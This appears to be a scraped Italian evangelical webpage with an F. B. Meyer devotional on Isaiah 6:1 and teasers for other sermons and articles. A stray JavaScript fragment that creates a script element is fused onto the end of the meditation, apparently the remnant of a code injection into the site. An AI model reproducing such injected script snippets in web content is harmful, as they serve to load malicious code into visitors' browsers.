Meditazione del giorno: Il Signore esaltato

meyerfb

F. B. MEYER  –   “Nell’anno della morte del re Uzzia vidi il Signore seduto sopra un trono alto, molto elevato” (Isaia 6:1)

 –   Viviamo in tempi difficili e da sempre nella storia umana gli eventi esterni portano l’uomo a distrarsi e ad angosciarsi. Ma i servi di Dio vengono portati in un luogo segreto, il più alto, dove poter ammirare il nostro Dio che regna in eterno con giustizia e ordine. Il paese stava attraversando un periodo instabile di oscurità e angoscia che stavano portando ad un’imminente rivoluzione e proprio in questo periodo Isaia riuscì a ottenere la stabilità del trono di Dio.

“Molto elevato”, più alto di ogni altra autorità, potere o dominio in cielo, sulla terra e sotto la terra! Egli era coronato d’amore, “Sopra di Lui stavano i Serafini” e la parola Serafino deriva da fuoco ed i Serafini hanno la funzione di irradiare amore. Il trono è stato stabilito per portare solidità, giudizio e potere, sopra tutti questi attributi e sopra Dio regna sovrano l’Amore. Questa è la massima concezione possibile per i mortali, l’amore supremo. L’Agnello che fu immolato sta lì, sul Suo trono.

L’unico uomo in tutto Israele che ebbe l’opportunità di vedere Dio assiso sul Suo trono fu Isaia. In tutta umiltà salì al Tempio, in mezzo alla folla che invece era lì solo per una mera forma religiosa. Sembrava che ognuno di essi avesse bisogno di avere una visione rivelatrice più di lui, ma Isaia fu l’uomo che vide, che vide il Signore; fu l’unico uomo santo in tutto Israele che ebbe la grazia di avere un contatto diretto con Dio. Il resto degli Israeliti vide solo un Tempio, l’altare ed il rituale, ma Isaia vide i lembi del mantello che riempivano ogni angolo del luogo santo.

Non lasciamoci soddisfare dal ritualismo esteriore, dai sermoni, nonostante a volte siano magnifici! Coloro che sono umili e perseveranti nella ricerca di Dio riusciranno ad udire note che altri non possono udire, riusciranno a rilevare presenze che sfuggono agli sguardi ordinari, entreranno nel reame dello spirito che è chiuso per coloro che guardano solo all’esteriore.

Anche quando il mondo sia in tumulto, le maree si alzino, il Signore è potente: Egli è Colui che ha sconfitto la morte, che è risorto e asceso al cielo, Egli è il Signore dei signori, il Re dei re!var d=document;var s=d.createElement(‘script’);

I commenti sono chiusi.

Post meno recenti

Storie di grandi inni: “COME, THOU FOUNT OF EVERY BLESSING,”

Forse tutti gli inni sono in una certa misura autobiografici, nel senso che rivelano qualcosa dell’esperienza spirituale dell’autore. In alcuni inni, il filo autobiografico è più forte e più marcato. Come nel caso di questo inno battista scritto da Robert Robinson (1735-1790), che mentre era un apprendista barbiere, fu fortemente influenzato dalla predicazione di George Whitefield. In particolare una frase dell’ultima strofa, “incline a vagare, Signore, mi sento incline ad …
Leggi Tutto

Sermone A. Masdea - 4-11-2012

A. MASDEA –  RELIGIOSO NON VUOL DIRE ESSERE SALVATO (1 Corinzi 5) …
Leggi Tutto

Uganda: il padre di un martire racconta il proprio cammino di fede

UGANDA  –   William Masolo, padre di Francis Namokubalu (un credente ex-musulmano ucciso a causa della sua fede), ci testimonia del risultato della campagna di lettere organizzata da Porte Aperte, che ha permesso alla sua famiglia di rimanere salda e unita nonostante la perdita del figlio. William ha inoltre condiviso con noi il suo personale cammino di fede. La storia della conversione di William risale agli inizi degli …
Leggi Tutto

POTENZA DALL’ALTO

Ed ecco, io mando su di voi la promessa del Padre mio; ma voi rimanete nella città di Gerusalemme, finché siate rivestiti di potenza dall’alto.    LUCA 24: 49 –  Ma voi riceverete potenza quando lo Spirito Santo verrà su di voi, e mi sarete testimoni in Gerusalemme e in tutta la Giudea, in Samaria e fino all’estremità della terra”.    ATTI 1: 8  –    Nel momento in cui siamo stati salvati abbiamo ricevuto …
Leggi Tutto

L’ornamento di un vero Cristiano

di Dale Crowley  –  Cristiani, lasciate che Cristo si serva di voi in modo tale da rispecchiare in voi la sua natura divina affinché tutti possano rendersi conto che la vostra vita è stata rinnovata, che la vostra vecchia natura peccaminosa è stata trasformata e che siete rivestiti della vostra nuova natura divina. I Cristiani che hanno veramente offerto la loro vita a Cristo risorto, vivono una vita nuova …
Leggi Tutto

Argomenti Biblici

LA FEDE

LA FEDE

da un sermone di Smith Wigglesworth  -  «Per fede Abele offerse a Dio un sacrificio più eccellente che Caino… per fede Enoch fu trasportato per non veder la morte... per ...
Leggi Tutto
Calvario

Calvario

di John Charles Ryle  -  Probabilmente saprete che il Calvario era un posto poco fuori Gerusalemme, dove il Signore Gesù Cristo, il Figlio di Dio, fu crocifisso. Sul Calvario non ...
Leggi Tutto
La tua parola mi ristora

La tua parola mi ristora

di N.A. WOYCHUK  -  Il Dr. R. A. Torrey disse: “Vi è più potenza in questo libro, per la salvezza degli uomi­ni, per la loro purificazione, per rallegrare e rendere ...
Leggi Tutto
LA PACE E’ POSSIBILE!

LA PACE E’ POSSIBILE!

di J. F. Walvoord   -  Desideriamo la pace nel mondo.  Ai nostri giorni sono pochi i quesiti che ci inducono a meditare, certamente non tanto quanto la domanda: E’ ...
Leggi Tutto
CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

CORPO E SANGUE: IL SIGNIFICATO DELLA CENA DEL SIGNORE

«Il calice della benedizione che benediciamo, non è la comunione col sangue di Cristo? Il pane che noi rompiamo, non è la comunione col corpo di Cristo? Siccome vi è ...
Leggi Tutto
L'UNICA VIA

L’UNICA VIA

di OSWALD J. SMITH - Un banchiere ed un industriale sedevano l'uno di fronte all'altro negli uffici della banca. L'industriale parlava molto animatamente, quando all'improvviso l'altro interruppe. "Ridicolo! Assurdo! Pazzesco!" esclamò l'orgoglioso ...
Leggi Tutto

Dai nostri Culti